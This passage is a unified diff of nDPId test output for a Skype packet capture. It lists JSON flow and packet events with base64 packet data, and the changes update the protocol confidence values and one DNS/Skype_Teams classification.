{"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707102,"flow_last_seen":1431970707102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970707102,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431970707102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970707102,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/2lAAEAGnL7AqAEi1KEIJMh2NFCv5GiXAAAAALAC\/\/+lEAAAAgQFtAEDAwUBAQgKPjKf5wAAAAAEAgAA"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2117,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431970707176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970707176,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHapD3vnr+RomKASOJCFFQAAAgQFrAQCCAo\/p5PEPjKf5wEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431970707911,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970707911,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+nsAAEAR9XPAqAEihexDGTLdwCsAGiMOfdMCo1rvIegrMqRysYXm5vlz"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -970,39 +973,39 @@ 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 